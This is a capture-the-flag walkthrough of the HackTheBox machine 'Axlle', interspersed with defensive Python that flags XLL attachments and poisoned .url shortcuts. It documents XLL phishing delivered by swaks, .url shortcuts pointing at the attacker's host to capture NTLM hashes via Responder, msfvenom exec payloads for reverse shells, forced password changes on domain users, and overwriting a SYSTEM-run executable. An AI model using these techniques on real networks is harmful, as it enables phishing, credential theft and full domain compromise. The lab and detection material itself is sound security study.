【season-5】 htb Axlle wp


User

nmap

└─$ sudo nmap -sU 10.129.29.242 --top-ports=200 --min-rate=3000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-22 22:08 EDT
Nmap scan report for 10.129.29.242 (10.129.29.242)
Host is up (0.50s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

####

PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-23 02:09:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name) (X)
445/tcp open microsoft-ds? (X)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
50741/tcp open msrpc Microsoft Windows RPC
56294/tcp open msrpc Microsoft Windows RPC
56309/tcp open msrpc Microsoft Windows RPC
62593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
62594/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows

Checked the domain name over LDAP.

ldapsearch

serverName: CN=MAINFRAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=axlle,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=axlle,DC=htb
namingContexts: DC=axlle,DC=htb
namingContexts: CN=Configuration,DC=axlle,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=axlle,DC=htb
namingContexts: DC=DomainDnsZones,DC=axlle,DC=htb
namingContexts: DC=ForestDnsZones,DC=axlle,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 156257
dsServiceName: CN=NTDS Settings,CN=MAINFRAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=axlle,DC=htb
dnsHostName: MAINFRAME.axlle.htb
defaultNamingContext: DC=axlle,DC=htb
currentTime: 20240623021359.0Z
configurationNamingContext: CN=Configuration,DC=axlle,DC=htb

SMB allows no anonymous access, so the entry point is most likely the web side.

http

DNS enumeration turned up mainframe.axlle.htb.

Directory brute-forcing found no useful paths.

(screenshot: web1)

I went through the whole site; the only clues are in the text on the page.

It says the mailbox only accepts files in Excel format.

If you have any outstanding invoices or requests, please email them to accounts@axlle.htb in Excel format. Please note that all macros are disabled due to our security posture.

But macros are off at the same time, so this clue points toward phishing with XLL for Excel, DDE for Word, and the like.

https://threatresearch.ext.hp.com/how-attackers-use-xll-malware-to-infect-systems/

So I looked for an XLL project. An XLL is really just a DLL, but Excel can load it directly, which fits the constraint here perfectly: macros disabled, yet still executed by Excel.

Attackers usually place their code in the xlAutoOpen function, which is executed immediately when the add-in is activated. What makes this technique dangerous is that only one click is required to run the malware, unlike VBA macros which require the user to disable Microsoft Office’s Protected View and enable macro content. However, XLL files are portable executables that follow the format of dynamic link libraries (DLLs) which many email gateways already block.

The article also points out that the xlAutoOpen function is one of the key points of this technique.

https://learn.microsoft.com/en-us/office/client-developer/excel/xlautoopen

Here is the official description of it:

# Remarks
Microsoft Excel calls xlAutoOpen whenever the XLL is activated. The XLL is activated in the following situations:

At the start of an Excel session if it was active in the last Excel session that ended normally.

If loaded during an Excel session.

An XLL can be loaded in several ways:

By choosing Open on the File menu (where the version of Excel supports this method of loading XLLs).

Using the Add-In Manager.

From another XLL that calls xlfRegister with the name of this DLL as the only argument.

From an XLM macro sheet that calls REGISTER with the name of this DLL as the only argument.

If the add-in is deactivated and reactivated during an Excel session, this function is called on reactivation.

In short, this function is called when the add-in is opened, i.e. as a function inside the DLL it gets called right at the start.

So there are really two ways to get RCE here: use the xlAutoOpen entry point described above, or rely on the fact that an XLL is a DLL and run the code at load time.
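As an added defensive example (my own code, not from this writeup or from the xllpoc project): a small Python filter for an inbound mailbox like accounts@axlle.htb that flags attachments which are XLL add-ins. As the HP article notes, an XLL is a PE/DLL, so it is caught by extension and, even when renamed to .xlsx, by the MZ header. The .eml below is constructed.

```python
import email
from email import policy

# Constructed sample mail: one genuine spreadsheet (PK zip header) and one
# attachment declared as .xlsx but carrying a PE (MZ) header like an XLL would.
SAMPLE_EML = b"""From: test@axlle.htb
To: accounts@axlle.htb
Subject: invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

see attached
--b1
Content-Type: application/octet-stream; name="invoice.xlsx"
Content-Disposition: attachment; filename="invoice.xlsx"
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAA==
--b1
Content-Type: application/octet-stream; name="report.xlsx"
Content-Disposition: attachment; filename="report.xlsx"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA=
--b1--
"""

# Extensions a gateway should reject outright (assumed policy, not from the page).
BLOCKED_EXT = (".xll", ".dll", ".exe")


def inspect_attachments(raw):
    """Return [(filename, [reasons])] for every attachment worth blocking."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        reasons = []
        if name.lower().endswith(BLOCKED_EXT):
            reasons.append("blocked extension")
        if data[:2] == b"MZ":  # PE header: a DLL/XLL/EXE whatever the name says
            reasons.append("PE header")
        if reasons:
            findings.append((name, reasons))
    return findings
```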

The project I used is

https://github.com/moohax/xllpoc

I put the execution in the DLL load path.

(screenshot: web2)

Compiling it that way gives an error:

错误	C4716	“xlAutoOpen”: 必须返回一个值	XLL_POC	

Going back and giving xlAutoOpen in XLL_POC.cpp a return value fixes it.

Once it compiled, I sent it with swaks:

swaks --to accounts@axlle.htb  --from test@axlle.htb --header "Subject: testt" --body "testt" --server axlle.htb --attach @poc.xll

Just send it over.

After a short wait you get a shell as the axlle\gideon.hamill user.

gideon.hamill -> dallon.matrix

Once in, I collected usernames, since they might be needed for password spraying later.

Administrator
baz.humphries
brad.shaw
calum.scott
dallon.matrix
dan.kendo
gideon.hamill
jacob.greeny
lindsay.richards
Public
simon.smalls
trent.langdon

There wasn't much in this user's home directory, but since the box runs hMailServer, I looked at the service directory.

There I found hMailServer.INI, which contains some passwords, though in encrypted form.

PS C:\Program Files (x86)\hMailServer\Bin> cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Looking through the mail store, I found this email:

PS C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2f> cat "{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml"
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
by MAINFRAME with ESMTP
; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/

Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team

The gist is that they have built an automated clicking application that opens the web shortcuts under C:\inetpub\testing (note that web shortcuts here are not .lnk files but .url files pointing at a URL).

I also grabbed the usernames from this email, as they might be useful.

dallon.matrix
calum.scott
trent.langdon
dan.kendo
david.brice
frankie.rose
samantha.fade
jess.adams
emily.cook
phoebe.graham
matt.drew
xavier.edmund
baz.humphries
jacob.greeny
webdevs

So there are two things I can try now:

  • 1. Decrypt the passwords in hMailServer.INI.
  • 2. Do something with the automated clicking, e.g. grab a hash over SMB or some other trick.

First, decryption. I used two projects here, because I suspected the decrypted result was wrong.. In the end I also modified a password decryption file found locally on the box, but it turned out to be a rabbit hole: none of the passwords were used.

https://github.com/mvdnes/hm_decrypt
https://github.com/GitMirar/hMailDatabasePasswordDecrypter

└─$ ./decrypt 52abe4d2e16269ddddf7b166218e92d9
4A02D41C55AC

That is the MSSQLCE password; the administrator one came out as garbage.

I still tried the MSSQLCE password against the users collected above, with no hits.

So I went with the second route: write a .url file, drop it into C:\inetpub\testing and poison it to grab an NTLM hash or similar.

The file can be written like this. I first tried smb:\\, which is not supported; file:// works.

[InternetShortcut]
URL=file://10.10.xx.xx/

Or you can create it directly with PowerShell:

$filePath = "\\10.10.16.x\"
$shortcutPath = "./test.url"
$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $filePath
$shortcut.Save()

I also tried this:

https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.url

The icon variant didn't trigger for some reason, which was odd.
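As an added defensive check (my own code, not from the writeup or the ired.team page): a Python scanner for a drop folder such as C:\inetpub\testing that flags .url shortcuts whose URL= or IconFile= value is a file:// or UNC path to a host outside an allowlist, i.e. the two shapes discussed above that make the automated clicker authenticate to an outside host. The sample shortcuts are constructed; the allowlist is an assumed parameter.

```python
import configparser
from pathlib import Path
from urllib.parse import urlparse

# Constructed samples: a shortcut with a file:// target, one with a UNC icon
# path, and a normal web shortcut that should pass.
POISONED_URL = "[InternetShortcut]\nURL=file://10.10.16.3/share\n"
ICON_URL = ("[InternetShortcut]\nURL=https://axlle.htb/\n"
            "IconFile=\\\\10.10.16.3\\icons\\x.ico\nIconIndex=1\n")
CLEAN_URL = "[InternetShortcut]\nURL=https://axlle.htb/portal\n"


def unc_host(value):
    """Return the host a UNC (\\\\host\\share) or file://host/ target points at, else None."""
    v = value.strip()
    if v.startswith("\\\\"):
        return v[2:].split("\\", 1)[0]
    p = urlparse(v)
    if p.scheme.lower() == "file" and p.netloc:
        return p.netloc
    return None


def check_shortcut(text, allowed_hosts=()):
    """Return [(key, host)] for every field that would force auth to a foreign host."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    if not cfg.has_section("InternetShortcut"):
        return []
    findings = []
    for key in ("URL", "IconFile"):  # both are opened by the shell on click/render
        if cfg.has_option("InternetShortcut", key):
            host = unc_host(cfg.get("InternetShortcut", key))
            if host and host.lower() not in allowed_hosts:
                findings.append((key, host))
    return findings


def scan_dir(folder, allowed_hosts=()):
    """Scan every .url file in folder and map filename -> findings."""
    report = {}
    for path in Path(folder).glob("*.url"):
        hits = check_shortcut(path.read_text(errors="ignore"), allowed_hosts)
        if hits:
            report[path.name] = hits
    return report
```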

Then with responder running locally and waiting for the click, I received the hash:


Amazingly an Administrator hash showed up as well.. but neither hash cracked.

I was stuck here for a while. Then I thought it over and re-read the mail; the line "Yours in click-worthy URLs" gave me an idea: after my .url is added to the site, someone may go and click it. So if I give it a nasty exe or some other payload, will it click and execute that too?

So I generated an exe with msfvenom (oddly, the normal payload I generated called back when I ran it myself, but got no response when run there, so in the end I used the exec payload to run a command).

After listening for a bit I got a reverse shell as the DALLON.MATRIX@AXLLE.HTB user.

DALLON.MATRIX@AXLLE.HTB -> APP DEVS

Ran BloodHound.

(screenshot: bh1)

The WEB DEVS group, which DALLON.MATRIX belongs to, has ForceChangePassword over two users in the APP DEVS group.

So pick an unlucky member of APP DEVS and change their password.

Set-DomainUserPassword -Identity "JACOB.GREENY" -Verbose

Both of those users are in the Remote Management Users group, so you can just log in over WinRM.

APP DEVS -> root

BloodHound showed no further leads from here.

So privilege escalation had to go some other way. I then remembered that when I first got the first user's shell and was browsing directories, there was an App Development directory under C:\; ls as that initial user returned nothing, which I assumed was a permissions issue, so I had set it aside.

Since this user's group is called APP DEVS, I went back to look at that application directory, and sure enough it was accessible now.

In the directory I found a README:

*Evil-WinRM* PS C:\App Development\kbfiltr> cat README.md
# Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.

## Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.

## Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

## Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10

## Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.

## Usage
### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.

### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.

### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.

## Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE

## Bugs
There are probably several.

In short, they have an application under development; the parts I care about are these:

...
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

Installing this application's development environment requires admin privileges, but it looks like it is already installed, so I kept that as a fallback.

Second, they wrote something that automatically runs C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe with admin privileges to test and debug this driver,

so I first went to that application directory to check whether standalonerunner.exe is writable.

I simply ran echo 1 > standalonerunner.exe.

And indeed there is write permission: the contents changed.

There is also a standalonerunner.dll in the directory, but I couldn't be bothered to look at which functions get called from it.. since the exe is writable, replacing the .exe is the first thing to try.

Since my normal msfvenom payload had problems, I again used msfvenom -a x64 --platform Windows -p windows/exec CMD="powershell ..." -f exe > standalonerunner.exe

After a while I noticed the file had been wiped.. probably a script resetting the directory, so I uploaded it once more, waited a bit, and got root.


If you like my articles, you can follow my favourite vsinger (XD

https://www.youtube.com/channel/UCBLGjbYv6-xxju1i44RjnnA